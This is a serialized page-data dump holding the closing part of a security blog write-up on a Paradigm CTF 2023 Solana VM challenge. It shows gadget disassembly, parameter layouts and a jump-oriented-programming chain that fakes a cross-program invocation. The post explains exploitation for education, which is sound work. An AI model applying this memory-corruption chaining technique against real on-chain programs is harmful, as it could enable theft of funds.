"props":51477,"children":51478},{"class":303,"line":666},[51479,51484,51489,51493,51497,51501,51505,51509,51514,51518,51523],{"type":24,"tag":301,"props":51480,"children":51481},{"style":369},[51482],{"type":30,"value":51483},"100001c10",{"type":24,"tag":301,"props":51485,"children":51486},{"style":369},[51487],{"type":30,"value":51488}," 79a2b8ff00000000",{"type":24,"tag":301,"props":51490,"children":51491},{"style":369},[51492],{"type":30,"value":50862},{"type":24,"tag":301,"props":51494,"children":51495},{"style":369},[51496],{"type":30,"value":50867},{"type":24,"tag":301,"props":51498,"children":51499},{"style":359},[51500],{"type":30,"value":50872},{"type":24,"tag":301,"props":51502,"children":51503},{"style":369},[51504],{"type":30,"value":50877},{"type":24,"tag":301,"props":51506,"children":51507},{"style":385},[51508],{"type":30,"value":9253},{"type":24,"tag":301,"props":51510,"children":51511},{"style":466},[51512],{"type":30,"value":51513},"72",{"type":24,"tag":301,"props":51515,"children":51516},{"style":359},[51517],{"type":30,"value":50891},{"type":24,"tag":301,"props":51519,"children":51520},{"style":369},[51521],{"type":30,"value":51522},"var_48",{"type":24,"tag":301,"props":51524,"children":51525},{"style":359},[51526],{"type":30,"value":698},{"type":24,"tag":301,"props":51528,"children":51529},{"class":303,"line":674},[51530,51535,51540,51545,51549,51553,51557,51561,51565,51569],{"type":24,"tag":301,"props":51531,"children":51532},{"style":369},[51533],{"type":30,"value":51534},"100001c18",{"type":24,"tag":301,"props":51536,"children":51537},{"style":466},[51538],{"type":30,"value":51539}," 1502040000000000",{"type":24,"tag":301,"props":51541,"children":51542},{"style":369},[51543],{"type":30,"value":51544}," jeq",{"type":24,"tag":301,"props":51546,"children":51547},{"style":359},[51548],{"type":30,"value":3950},{"type":24,"tag":301,"props":51550,"children":51551},{"style":385},[51552],{"type":30,"value":11206},{"type":24,"tag":301,"props":51554,"children":51555},{"style":466},[51556],{"type":30,"value":1761},{"type":24,"tag":301,"props":51558,"children":51559},{"style":359},[51560],{"type":30,"value":12641},{"type":24,"tag":301,"props":51562,"children":51563},{"style":369},[51564],{"type":30,"value":51243},{"type":24,"tag":301,"props":51566,"children":51567},{"style":359},[51568],{"type":30,"value":377},{"type":24,"tag":301,"props":51570,"children":51571},{"style":466},[51572],{"type":30,"value":51126},{"type":24,"tag":301,"props":51574,"children":51575},{"class":303,"line":692},[51576],{"type":24,"tag":301,"props":51577,"children":51578},{"emptyLinePlaceholder":16},[51579],{"type":30,"value":341},{"type":24,"tag":301,"props":51581,"children":51582},{"class":303,"line":3631},[51583,51588,51593,51598,51602,51606],{"type":24,"tag":301,"props":51584,"children":51585},{"style":369},[51586],{"type":30,"value":51587},"100001c20",{"type":24,"tag":301,"props":51589,"children":51590},{"style":466},[51591],{"type":30,"value":51592}," 2702000022000000",{"type":24,"tag":301,"props":51594,"children":51595},{"style":369},[51596],{"type":30,"value":51597}," mul",{"type":24,"tag":301,"props":51599,"children":51600},{"style":369},[51601],{"type":30,"value":50867},{"type":24,"tag":301,"props":51603,"children":51604},{"style":359},[51605],{"type":30,"value":377},{"type":24,"tag":301,"props":51607,"children":51608},{"style":466},[51609],{"type":30,"value":51610},"0x22\n",{"type":24,"tag":301,"props":51612,"children":51613},{"class":303,"line":3639},[51614,51619,51624,51628,51632,51636,51640,51644,51649,51653,51658],{"type":24,"tag":301,"props":51615,"children":51616},{"style":369},[51617],{"type":30,"value":51618},"100001c28",{"type":24,"tag":301,"props":51620,"children":51621},{"style":369},[51622],{"type":30,"value":51623}," 79a1b0ff00000000",{"type":24,"tag":301,"props":51625,"children":51626},{"style":369},[51627],{"type":30,"value":50862},{"type":24,"tag":301,"props":51629,"children":51630},{"style":369},[51631],{"type":30,"value":51156},{"type":24,"tag":301,"props":51633,"children":51634},{"style":359},[51635],{"type":30,"value":50872},{"type":24,"tag":301,"props":51637,"children":51638},{"style":369},[51639],{"type":30,"value":50877},{"type":24,"tag":301,"props":51641,"children":51642},{"style":385},[51643],{"type":30,"value":9253},{"type":24,"tag":301,"props":51645,"children":51646},{"style":466},[51647],{"type":30,"value":51648},"80",{"type":24,"tag":301,"props":51650,"children":51651},{"style":359},[51652],{"type":30,"value":50891},{"type":24,"tag":301,"props":51654,"children":51655},{"style":369},[51656],{"type":30,"value":51657},"var_50",{"type":24,"tag":301,"props":51659,"children":51660},{"style":359},[51661],{"type":30,"value":698},{"type":24,"tag":301,"props":51663,"children":51664},{"class":303,"line":3647},[51665,51670,51675,51679,51683,51687],{"type":24,"tag":301,"props":51666,"children":51667},{"style":369},[51668],{"type":30,"value":51669},"100001c30",{"type":24,"tag":301,"props":51671,"children":51672},{"style":369},[51673],{"type":30,"value":51674}," b703000001000000",{"type":24,"tag":301,"props":51676,"children":51677},{"style":369},[51678],{"type":30,"value":51151},{"type":24,"tag":301,"props":51680,"children":51681},{"style":369},[51682],{"type":30,"value":50922},{"type":24,"tag":301,"props":51684,"children":51685},{"style":359},[51686],{"type":30,"value":377},{"type":24,"tag":301,"props":51688,"children":51689},{"style":466},[51690],{"type":30,"value":51691},"0x1\n",{"type":24,"tag":301,"props":51693,"children":51694},{"class":303,"line":3685},[51695,51700,51705,51709],{"type":24,"tag":301,"props":51696,"children":51697},{"style":369},[51698],{"type":30,"value":51699},"100001c38",{"type":24,"tag":301,"props":51701,"children":51702},{"style":369},[51703],{"type":30,"value":51704}," 8510000003feffff",{"type":24,"tag":301,"props":51706,"children":51707},{"style":369},[51708],{"type":30,"value":51073},{"type":24,"tag":301,"props":51710,"children":51711},{"style":369},[51712],{"type":30,"value":51713}," __rust_dealloc\n",{"type":24,"tag":301,"props":51715,"children":51716},{"class":303,"line":3713},[51717],{"type":24,"tag":301,"props":51718,"children":51719},{"emptyLinePlaceholder":16},[51720],{"type":30,"value":341},{"type":24,"tag":301,"props":51722,"children":51723},{"class":303,"line":3721},[51724,51729,51734,51738,51742,51746,51750,51754,51759,51763,51768],{"type":24,"tag":301,"props":51725,"children":51726},{"style":369},[51727],{"type":30,"value":51728},"100001c40",{"type":24,"tag":301,"props":51730,"children":51731},{"style":369},[51732],{"type":30,"value":51733}," 79a2d0ff00000000",{"type":24,"tag":301,"props":51735,"children":51736},{"style":369},[51737],{"type":30,"value":50862},{"type":24,"tag":301,"props":51739,"children":51740},{"style":369},[51741],{"type":30,"value":50867},{"type":24,"tag":301,"props":51743,"children":51744},{"style":359},[51745],{"type":30,"value":50872},{"type":24,"tag":301,"props":51747,"children":51748},{"style":369},[51749],{"type":30,"value":50877},{"type":24,"tag":301,"props":51751,"children":51752},{"style":385},[51753],{"type":30,"value":9253},{"type":24,"tag":301,"props":51755,"children":51756},{"style":466},[51757],{"type":30,"value":51758},"48",{"type":24,"tag":301,"props":51760,"children":51761},{"style":359},[51762],{"type":30,"value":50891},{"type":24,"tag":301,"props":51764,"children":51765},{"style":369},[51766],{"type":30,"value":51767},"var_30",{"type":24,"tag":301,"props":51769,"children":51770},{"style":359},[51771],{"type":30,"value":698},{"type":24,"tag":301,"props":51773,"children":51774},{"class":303,"line":3751},[51775,51780,51785,51789,51793,51797,51801,51805,51809,51813],{"type":24,"tag":301,"props":51776,"children":51777},{"style":369},[51778],{"type":30,"value":51779},"100001c48",{"type":24,"tag":301,"props":51781,"children":51782},{"style":466},[51783],{"type":30,"value":51784}," 1502030000000000",{"type":24,"tag":301,"props":51786,"children":51787},{"style":369},[51788],{"type":30,"value":51544},{"type":24,"tag":301,"props":51790,"children":51791},{"style":359},[51792],{"type":30,"value":3950},{"type":24,"tag":301,"props":51794,"children":51795},{"style":385},[51796],{"type":30,"value":11206},{"type":24,"tag":301,"props":51798,"children":51799},{"style":466},[51800],{"type":30,"value":1447},{"type":24,"tag":301,"props":51802,"children":51803},{"style":359},[51804],{"type":30,"value":12641},{"type":24,"tag":301,"props":51806,"children":51807},{"style":369},[51808],{"type":30,"value":51243},{"type":24,"tag":301,"props":51810,"children":51811},{"style":359},[51812],{"type":30,"value":377},{"type":24,"tag":301,"props":51814,"children":51815},{"style":466},[51816],{"type":30,"value":51126},{"type":24,"tag":301,"props":51818,"children":51819},{"class":303,"line":3782},[51820],{"type":24,"tag":301,"props":51821,"children":51822},{"emptyLinePlaceholder":16},[51823],{"type":30,"value":341},{"type":24,"tag":301,"props":51825,"children":51826},{"class":303,"line":3791},[51827,51832,51837,51841,51845,51849,51853,51857,51862,51866,51871],{"type":24,"tag":301,"props":51828,"children":51829},{"style":369},[51830],{"type":30,"value":51831},"100001c50",{"type":24,"tag":301,"props":51833,"children":51834},{"style":369},[51835],{"type":30,"value":51836}," 79a1c8ff00000000",{"type":24,"tag":301,"props":51838,"children":51839},{"style":369},[51840],{"type":30,"value":50862},{"type":24,"tag":301,"props":51842,"children":51843},{"style":369},[51844],{"type":30,"value":51156},{"type":24,"tag":301,"props":51846,"children":51847},{"style":359},[51848],{"type":30,"value":50872},{"type":24,"tag":301,"props":51850,"children":51851},{"style":369},[51852],{"type":30,"value":50877},{"type":24,"tag":301,"props":51854,"children":51855},{"style":385},[51856],{"type":30,"value":9253},{"type":24,"tag":301,"props":51858,"children":51859},{"style":466},[51860],{"type":30,"value":51861},"56",{"type":24,"tag":301,"props":51863,"children":51864},{"style":359},[51865],{"type":30,"value":50891},{"type":24,"tag":301,"props":51867,"children":51868},{"style":369},[51869],{"type":30,"value":51870},"var_38",{"type":24,"tag":301,"props":51872,"children":51873},{"style":359},[51874],{"type":30,"value":698},{"type":24,"tag":301,"props":51876,"children":51877},{"class":303,"line":3819},[51878,51883,51887,51891,51895,51899],{"type":24,"tag":301,"props":51879,"children":51880},{"style":369},[51881],{"type":30,"value":51882},"100001c58",{"type":24,"tag":301,"props":51884,"children":51885},{"style":369},[51886],{"type":30,"value":51674},{"type":24,"tag":301,"props":51888,"children":51889},{"style":369},[51890],{"type":30,"value":51151},{"type":24,"tag":301,"props":51892,"children":51893},{"style":369},[51894],{"type":30,"value":50922},{"type":24,"tag":301,"props":51896,"children":51897},{"style":359},[51898],{"type":30,"value":377},{"type":24,"tag":301,"props":51900,"children":51901},{"style":466},[51902],{"type":30,"value":51691},{"type":24,"tag":301,"props":51904,"children":51905},{"class":303,"line":4397},[51906,51911,51916,51920],{"type":24,"tag":301,"props":51907,"children":51908},{"style":369},[51909],{"type":30,"value":51910},"100001c60",{"type":24,"tag":301,"props":51912,"children":51913},{"style":369},[51914],{"type":30,"value":51915}," 85100000fefdffff",{"type":24,"tag":301,"props":51917,"children":51918},{"style":369},[51919],{"type":30,"value":51073},{"type":24,"tag":301,"props":51921,"children":51922},{"style":369},[51923],{"type":30,"value":51713},{"type":24,"tag":301,"props":51925,"children":51926},{"class":303,"line":4405},[51927],{"type":24,"tag":301,"props":51928,"children":51929},{"emptyLinePlaceholder":16},[51930],{"type":30,"value":341},{"type":24,"tag":301,"props":51932,"children":51933},{"class":303,"line":4422},[51934,51939,51944,51949,51954,51959],{"type":24,"tag":301,"props":51935,"children":51936},{"style":369},[51937],{"type":30,"value":51938},"100001c68",{"type":24,"tag":301,"props":51940,"children":51941},{"style":466},[51942],{"type":30,"value":51943}," 9500000000000000",{"type":24,"tag":301,"props":51945,"children":51946},{"style":369},[51947],{"type":30,"value":51948}," exit",{"type":24,"tag":301,"props":51950,"children":51951},{"style":359},[51952],{"type":30,"value":51953}," {",{"type":24,"tag":301,"props":51955,"children":51956},{"style":369},[51957],{"type":30,"value":51958},"__return_addr",{"type":24,"tag":301,"props":51960,"children":51961},{"style":359},[51962],{"type":30,"value":698},{"type":24,"tag":32,"props":51964,"children":51965},{},[51966,51968,51974],{"type":30,"value":51967},"Which, assuming that ",{"type":24,"tag":145,"props":51969,"children":51971},{"className":51970},[],[51972],{"type":30,"value":51973},"sol_invoke_signed_rust",{"type":30,"value":51975}," returns 0, is doing the following:",{"type":24,"tag":6246,"props":51977,"children":51978},{},[51979,51988,51997],{"type":24,"tag":2659,"props":51980,"children":51981},{},[51982],{"type":24,"tag":145,"props":51983,"children":51985},{"className":51984},[],[51986],{"type":30,"value":51987},"sol_invoke_signed_rust(r1, [r10-136], [r10-128], [r10-152], [r10-144])",{"type":24,"tag":2659,"props":51989,"children":51990},{},[51991],{"type":24,"tag":145,"props":51992,"children":51994},{"className":51993},[],[51995],{"type":30,"value":51996},"*[r10-120] = 0x18",{"type":24,"tag":2659,"props":51998,"children":51999},{},[52000,52002,52008,52010,52017],{"type":30,"value":52001},"Calls ",{"type":24,"tag":145,"props":52003,"children":52005},{"className":52004},[],[52006],{"type":30,"value":52007},"__rust_dealloc",{"type":30,"value":52009},", which in default circumstances is a ",{"type":24,"tag":188,"props":52011,"children":52014},{"href":52012,"rel":52013},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/entrypoint.rs#L257C1-L259",[192],[52015],{"type":30,"value":52016},"NOP",{"type":30,"value":206},{"type":24,"tag":32,"props":52019,"children":52020},{},[52021],{"type":30,"value":52022},"r10 is the stack pointer, so it will point to the stack frame of the current depth when executing that instruction.",{"type":24,"tag":32,"props":52024,"children":52025},{},[52026],{"type":30,"value":52027},"If we correctly set up the stack frame used by this gadget with valid parameters, that's a win.",{"type":24,"tag":32,"props":52029,"children":52030},{},[52031,52033,52040],{"type":30,"value":52032},"Looking at the ",{"type":24,"tag":188,"props":52034,"children":52037},{"href":52035,"rel":52036},"https://github.com/solana-labs/solana/blob/master/sdk/program/src/syscalls/definitions.rs#L59",[192],[52038],{"type":30,"value":52039},"definition",{"type":30,"value":52041},", it's not crystal clear what the parameters are:",{"type":24,"tag":291,"props":52043,"children":52045},{"className":9818,"code":52044,"language":9817,"meta":7,"style":7},"fn sol_invoke_signed_rust(instruction_addr: *const u8, account_infos_addr: *const u8, account_infos_len: u64, signers_seeds_addr: *const u8, signers_seeds_len: u64) -> u64\n",[52046],{"type":24,"tag":145,"props":52047,"children":52048},{"__ignoreMap":7},[52049],{"type":24,"tag":301,"props":52050,"children":52051},{"class":303,"line":304},[52052,52056,52061,52065,52070,52074,52078,52082,52086,52090,52095,52099,52103,52107,52111,52115,52120,52124,52128,52132,52137,52141,52145,52149,52153,52157,52162,52166,52170,52174,52178],{"type":24,"tag":301,"props":52053,"children":52054},{"style":348},[52055],{"type":30,"value":27037},{"type":24,"tag":301,"props":52057,"children":52058},{"style":314},[52059],{"type":30,"value":52060}," sol_invoke_signed_rust",{"type":24,"tag":301,"props":52062,"children":52063},{"style":359},[52064],{"type":30,"value":362},{"type":24,"tag":301,"props":52066,"children":52067},{"style":369},[52068],{"type":30,"value":52069},"instruction_addr",{"type":24,"tag":301,"props":52071,"children":52072},{"style":385},[52073],{"type":30,"value":1679},{"type":24,"tag":301,"props":52075,"children":52076},{"style":385},[52077],{"type":30,"value":431},{"type":24,"tag":301,"props":52079,"children":52080},{"style":348},[52081],{"type":30,"value":16460},{"type":24,"tag":301,"props":52083,"children":52084},{"style":10246},[52085],{"type":30,"value":21426},{"type":24,"tag":301,"props":52087,"children":52088},{"style":359},[52089],{"type":30,"value":377},{"type":24,"tag":301,"props":52091,"children":52092},{"style":369},[52093],{"type":30,"value":52094},"account_infos_addr",{"type":24,"tag":301,"props":52096,"children":52097},{"style":385},[52098],{"type":30,"value":1679},{"type":24,"tag":301,"props":52100,"children":52101},{"style":385},[52102],{"type":30,"value":431},{"type":24,"tag":301,"props":52104,"children":52105},{"style":348},[52106],{"type":30,"value":16460},{"type":24,"tag":301,"props":52108,"children":52109},{"style":10246},[52110],{"type":30,"value":21426},{"type":24,"tag":301,"props":52112,"children":52113},{"style":359},[52114],{"type":30,"value":377},{"type":24,"tag":301,"props":52116,"children":52117},{"style":369},[52118],{"type":30,"value":52119},"account_infos_len",{"type":24,"tag":301,"props":52121,"children":52122},{"style":385},[52123],{"type":30,"value":1679},{"type":24,"tag":301,"props":52125,"children":52126},{"style":10246},[52127],{"type":30,"value":12680},{"type":24,"tag":301,"props":52129,"children":52130},{"style":359},[52131],{"type":30,"value":377},{"type":24,"tag":301,"props":52133,"children":52134},{"style":369},[52135],{"type":30,"value":52136},"signers_seeds_addr",{"type":24,"tag":301,"props":52138,"children":52139},{"style":385},[52140],{"type":30,"value":1679},{"type":24,"tag":301,"props":52142,"children":52143},{"style":385},[52144],{"type":30,"value":431},{"type":24,"tag":301,"props":52146,"children":52147},{"style":348},[52148],{"type":30,"value":16460},{"type":24,"tag":301,"props":52150,"children":52151},{"style":10246},[52152],{"type":30,"value":21426},{"type":24,"tag":301,"props":52154,"children":52155},{"style":359},[52156],{"type":30,"value":377},{"type":24,"tag":301,"props":52158,"children":52159},{"style":369},[52160],{"type":30,"value":52161},"signers_seeds_len",{"type":24,"tag":301,"props":52163,"children":52164},{"style":385},[52165],{"type":30,"value":1679},{"type":24,"tag":301,"props":52167,"children":52168},{"style":10246},[52169],{"type":30,"value":12680},{"type":24,"tag":301,"props":52171,"children":52172},{"style":359},[52173],{"type":30,"value":911},{"type":24,"tag":301,"props":52175,"children":52176},{"style":385},[52177],{"type":30,"value":882},{"type":24,"tag":301,"props":52179,"children":52180},{"style":10246},[52181],{"type":30,"value":19991},{"type":24,"tag":32,"props":52183,"children":52184},{},[52185,52187,52192,52194,52201],{"type":30,"value":52186},"The source of ",{"type":24,"tag":188,"props":52188,"children":52190},{"href":52189},"(https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/program.rs#L289)",[52191],{"type":30,"value":50803},{"type":30,"value":52193}," helps a lot, but looking at the actual ",{"type":24,"tag":188,"props":52195,"children":52198},{"href":52196,"rel":52197},"https://github.com/solana-labs/solana/blob/v1.17.4/programs/bpf_loader/src/syscalls/cpi.rs#L458-L637",[192],[52199],{"type":30,"value":52200},"implementation",{"type":30,"value":52202}," provides more clarity:",{"type":24,"tag":2655,"props":52204,"children":52205},{},[52206],{"type":24,"tag":2659,"props":52207,"children":52208},{},[52209,52214,52216,52223],{"type":24,"tag":145,"props":52210,"children":52212},{"className":52211},[],[52213],{"type":30,"value":52069},{"type":30,"value":52215}," points to a ",{"type":24,"tag":188,"props":52217,"children":52220},{"href":52218,"rel":52219},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/stable_layout/stable_instruction.rs#L33",[192],[52221],{"type":30,"value":52222},"StableInstruction",{"type":30,"value":1679},{"type":24,"tag":32,"props":52225,"children":52226},{},[52227],{"type":24,"tag":177,"props":52228,"children":52230},{"alt":52222,"src":52229},"/posts/jumping-around-in-the-vm/stable_ix.svg",[],{"type":24,"tag":2655,"props":52232,"children":52233},{},[52234,52259],{"type":24,"tag":2659,"props":52235,"children":52236},{},[52237,52242,52244,52249,52251,52258],{"type":24,"tag":145,"props":52238,"children":52240},{"className":52239},[],[52241],{"type":30,"value":52094},{"type":30,"value":52243}," points to a slice of ",{"type":24,"tag":145,"props":52245,"children":52247},{"className":52246},[],[52248],{"type":30,"value":52119},{"type":30,"value":52250}," ",{"type":24,"tag":188,"props":52252,"children":52255},{"href":52253,"rel":52254},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/account_info.rs#L19-L36",[192],[52256],{"type":30,"value":52257},"AccountInfos",{"type":30,"value":206},{"type":24,"tag":2659,"props":52260,"children":52261},{},[52262,52267,52269,52274,52276,52281],{"type":24,"tag":145,"props":52263,"children":52265},{"className":52264},[],[52266],{"type":30,"value":52136},{"type":30,"value":52268}," is a bit trickier, it points to a slice of length ",{"type":24,"tag":145,"props":52270,"children":52272},{"className":52271},[],[52273],{"type":30,"value":52161},{"type":30,"value":52275},", containing slices of ",{"type":24,"tag":145,"props":52277,"children":52279},{"className":52278},[],[52280],{"type":30,"value":10249},{"type":30,"value":206},{"type":24,"tag":32,"props":52283,"children":52284},{},[52285],{"type":24,"tag":177,"props":52286,"children":52289},{"alt":52287,"src":52288},"signers.drawio","/posts/jumping-around-in-the-vm/signers.svg",[],{"type":24,"tag":32,"props":52291,"children":52292},{},[52293,52295,52300],{"type":30,"value":52294},"Where do we store those fake parameters? We can store them directly inside the input data, and just write the pointers to them on the stack through the write gadget. Note that these writes are to ",{"type":24,"tag":5422,"props":52296,"children":52297},{},[52298],{"type":30,"value":52299},"future call frames",{"type":30,"value":206},{"type":24,"tag":32,"props":52302,"children":52303},{},[52304,52306,52313],{"type":30,"value":52305},"Now that we have all the parts, all we need is to string it together. The full ",{"type":24,"tag":188,"props":52307,"children":52310},{"href":52308,"rel":52309},"https://github.com/chen-robert/paradigmctf-2023/blob/main/jotterp/framework-solve/src/main.rs",[192],[52311],{"type":30,"value":52312},"reference solution can be found here",{"type":30,"value":206},{"type":24,"tag":32,"props":52315,"children":52316},{},[52317],{"type":30,"value":52318},"Here's a visualization of the final JOP chain.",{"type":24,"tag":291,"props":52320,"children":52322},{"className":50685,"code":52321,"language":50687,"meta":7,"style":7},"graph BT\n A[0: entrypoint] --> B[1: process_instruction]\n B --> C[2: process]\n C --> D[3: Write account_infos.ptr to target_r10 - 136]\n C --> E[3: process]\n E --> F[4: Write account_infos.len to target_r10 - 128]\n E --> G[4: process]\n G --> H[5: Write signers_seeds.ptr to target_r10 - 152]\n G --> I[5: process]\n I --> J[6: Write signers_seeds.len to target_r10 - 144]\n I --> K[6: process]\n K --> M[7: Write HeapBase to target_r10 - 120]\n K --> N[7: process]\n N --> P[8: Invoke CPI Gadget with R0 pointing to the CreateAccount instruction]\n N --> O[8: Write 0x4337 to the account]\n",[52323],{"type":24,"tag":145,"props":52324,"children":52325},{"__ignoreMap":7},[52326,52334,52341,52348,52356,52363,52371,52379,52387,52395,52403,52411,52419,52427,52435],{"type":24,"tag":301,"props":52327,"children":52328},{"class":303,"line":304},[52329],{"type":24,"tag":301,"props":52330,"children":52331},{},[52332],{"type":30,"value":52333},"graph BT\n",{"type":24,"tag":301,"props":52335,"children":52336},{"class":303,"line":320},[52337],{"type":24,"tag":301,"props":52338,"children":52339},{},[52340],{"type":30,"value":50707},{"type":24,"tag":301,"props":52342,"children":52343},{"class":303,"line":335},[52344],{"type":24,"tag":301,"props":52345,"children":52346},{},[52347],{"type":30,"value":50715},{"type":24,"tag":301,"props":52349,"children":52350},{"class":303,"line":344},[52351],{"type":24,"tag":301,"props":52352,"children":52353},{},[52354],{"type":30,"value":52355}," C --> D[3: Write account_infos.ptr to target_r10 - 136]\n",{"type":24,"tag":301,"props":52357,"children":52358},{"class":303,"line":401},[52359],{"type":24,"tag":301,"props":52360,"children":52361},{},[52362],{"type":30,"value":50731},{"type":24,"tag":301,"props":52364,"children":52365},{"class":303,"line":415},[52366],{"type":24,"tag":301,"props":52367,"children":52368},{},[52369],{"type":30,"value":52370}," E --> F[4: Write account_infos.len to target_r10 - 128]\n",{"type":24,"tag":301,"props":52372,"children":52373},{"class":303,"line":439},[52374],{"type":24,"tag":301,"props":52375,"children":52376},{},[52377],{"type":30,"value":52378}," E --> G[4: process]\n",{"type":24,"tag":301,"props":52380,"children":52381},{"class":303,"line":447},[52382],{"type":24,"tag":301,"props":52383,"children":52384},{},[52385],{"type":30,"value":52386}," G --> H[5: Write signers_seeds.ptr to target_r10 - 152]\n",{"type":24,"tag":301,"props":52388,"children":52389},{"class":303,"line":476},[52390],{"type":24,"tag":301,"props":52391,"children":52392},{},[52393],{"type":30,"value":52394}," G --> I[5: process]\n",{"type":24,"tag":301,"props":52396,"children":52397},{"class":303,"line":495},[52398],{"type":24,"tag":301,"props":52399,"children":52400},{},[52401],{"type":30,"value":52402}," I --> J[6: Write signers_seeds.len to target_r10 - 144]\n",{"type":24,"tag":301,"props":52404,"children":52405},{"class":303,"line":504},[52406],{"type":24,"tag":301,"props":52407,"children":52408},{},[52409],{"type":30,"value":52410}," I --> K[6: process]\n",{"type":24,"tag":301,"props":52412,"children":52413},{"class":303,"line":512},[52414],{"type":24,"tag":301,"props":52415,"children":52416},{},[52417],{"type":30,"value":52418}," K --> M[7: Write HeapBase to target_r10 - 120]\n",{"type":24,"tag":301,"props":52420,"children":52421},{"class":303,"line":592},[52422],{"type":24,"tag":301,"props":52423,"children":52424},{},[52425],{"type":30,"value":52426}," K --> N[7: process]\n",{"type":24,"tag":301,"props":52428,"children":52429},{"class":303,"line":619},[52430],{"type":24,"tag":301,"props":52431,"children":52432},{},[52433],{"type":30,"value":52434}," N --> P[8: Invoke CPI Gadget with R0 pointing to the CreateAccount instruction]\n",{"type":24,"tag":301,"props":52436,"children":52437},{"class":303,"line":635},[52438],{"type":24,"tag":301,"props":52439,"children":52440},{},[52441],{"type":30,"value":52442}," N --> O[8: Write 0x4337 to the account]\n",{"type":24,"tag":32,"props":52444,"children":52445},{},[52446,52448,52454],{"type":30,"value":52447},"Small note: ",{"type":24,"tag":145,"props":52449,"children":52451},{"className":52450},[],[52452],{"type":30,"value":52453},"target_r10",{"type":30,"value":52455}," is the address of the call frame when the CPI gadget is invoked, which, as shown in the graph, is the 8th frame. Its address can be calculated as follows:",{"type":24,"tag":291,"props":52457,"children":52459},{"className":9818,"code":52458,"language":9817,"meta":7,"style":7},"fn call_frame_addr(depth: u64) -> u64 {\n 0x200000000 + 0x2000 * depth + 0x1000\n}\n// call_frame_addr(8) = 0x200011000\n",[52460],{"type":24,"tag":145,"props":52461,"children":52462},{"__ignoreMap":7},[52463,52508,52543,52550],{"type":24,"tag":301,"props":52464,"children":52465},{"class":303,"line":304},[52466,52470,52475,52479,52484,52488,52492,52496,52500,52504],{"type":24,"tag":301,"props":52467,"children":52468},{"style":348},[52469],{"type":30,"value":27037},{"type":24,"tag":301,"props":52471,"children":52472},{"style":314},[52473],{"type":30,"value":52474}," call_frame_addr",{"type":24,"tag":301,"props":52476,"children":52477},{"style":359},[52478],{"type":30,"value":362},{"type":24,"tag":301,"props":52480,"children":52481},{"style":369},[52482],{"type":30,"value":52483},"depth",{"type":24,"tag":301,"props":52485,"children":52486},{"style":385},[52487],{"type":30,"value":1679},{"type":24,"tag":301,"props":52489,"children":52490},{"style":10246},[52491],{"type":30,"value":12680},{"type":24,"tag":301,"props":52493,"children":52494},{"style":359},[52495],{"type":30,"value":911},{"type":24,"tag":301,"props":52497,"children":52498},{"style":385},[52499],{"type":30,"value":882},{"type":24,"tag":301,"props":52501,"children":52502},{"style":10246},[52503],{"type":30,"value":12680},{"type":24,"tag":301,"props":52505,"children":52506},{"style":359},[52507],{"type":30,"value":3035},{"type":24,"tag":301,"props":52509,"children":52510},{"class":303,"line":320},[52511,52516,52520,52525,52529,52534,52538],{"type":24,"tag":301,"props":52512,"children":52513},{"style":466},[52514],{"type":30,"value":52515}," 0x200000000",{"type":24,"tag":301,"props":52517,"children":52518},{"style":385},[52519],{"type":30,"value":957},{"type":24,"tag":301,"props":52521,"children":52522},{"style":466},[52523],{"type":30,"value":52524}," 0x2000",{"type":24,"tag":301,"props":52526,"children":52527},{"style":385},[52528],{"type":30,"value":431},{"type":24,"tag":301,"props":52530,"children":52531},{"style":369},[52532],{"type":30,"value":52533}," depth",{"type":24,"tag":301,"props":52535,"children":52536},{"style":385},[52537],{"type":30,"value":957},{"type":24,"tag":301,"props":52539,"children":52540},{"style":466},[52541],{"type":30,"value":52542}," 0x1000\n",{"type":24,"tag":301,"props":52544,"children":52545},{"class":303,"line":335},[52546],{"type":24,"tag":301,"props":52547,"children":52548},{"style":359},[52549],{"type":30,"value":698},{"type":24,"tag":301,"props":52551,"children":52552},{"class":303,"line":344},[52553],{"type":24,"tag":301,"props":52554,"children":52555},{"style":1062},[52556],{"type":30,"value":52557},"// call_frame_addr(8) = 0x200011000\n",{"type":24,"tag":43,"props":52559,"children":52560},{"id":9652},[52561],{"type":30,"value":9655},{"type":24,"tag":32,"props":52563,"children":52564},{},[52565,52567,52574],{"type":30,"value":52566},"Most blockchain vulnerabilities are high-level business logic bugs. While low-level Solana bugs are rare, ",{"type":24,"tag":188,"props":52568,"children":52571},{"href":52569,"rel":52570},"https://osec.io/blog/2022-12-09-rust-realloc-and-references",[192],[52572],{"type":30,"value":52573},"they do exist",{"type":30,"value":206},{"type":24,"tag":32,"props":52576,"children":52577},{},[52578],{"type":30,"value":52579},"In this blog post, we provided an exploration of the exploitation side of security. There's a surprising amount of work necessary to go from powerful memory corruption primitives to full control of the program.",{"type":24,"tag":32,"props":52581,"children":52582},{},[52583,52585,52590],{"type":30,"value":52584},"Security requires a top-to-bottom understanding of the execution environment. We hope this challenge and blog post motivate others to understand the ",{"type":24,"tag":5422,"props":52586,"children":52587},{},[52588],{"type":30,"value":52589},"entire",{"type":30,"value":52591}," runtime.",{"type":24,"tag":9672,"props":52593,"children":52594},{},[52595],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":52597},[52598,52602,52603,52606],{"id":25732,"depth":320,"text":25735,"children":52599},[52600,52601],{"id":47277,"depth":335,"text":47280},{"id":48595,"depth":335,"text":48598},{"id":49834,"depth":320,"text":49837},{"id":50667,"depth":320,"text":50670,"children":52604},[52605],{"id":50781,"depth":335,"text":50784},{"id":9652,"depth":320,"text":9655},"content:blog:2023-12-11-jumping-around-in-the-vm.md","blog/2023-12-11-jumping-around-in-the-vm.md","blog/2023-12-11-jumping-around-in-the-vm",{"_path":52611,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":52612,"description":52613,"author":52614,"image":52615,"date":52617,"isFeatured":16,"onBlogPage":16,"body":52618,"_type":9700,"_id":53764,"_source":9702,"_file":53765,"_stem":53766,"_extension":9705},"/blog/2024-01-18-rounding-bugs","Rounding Bugs: An Analysis","Rounding-related hacks are having a moment in the spotlight. We explore these exploits, correct some popular misunderstandings, and provide 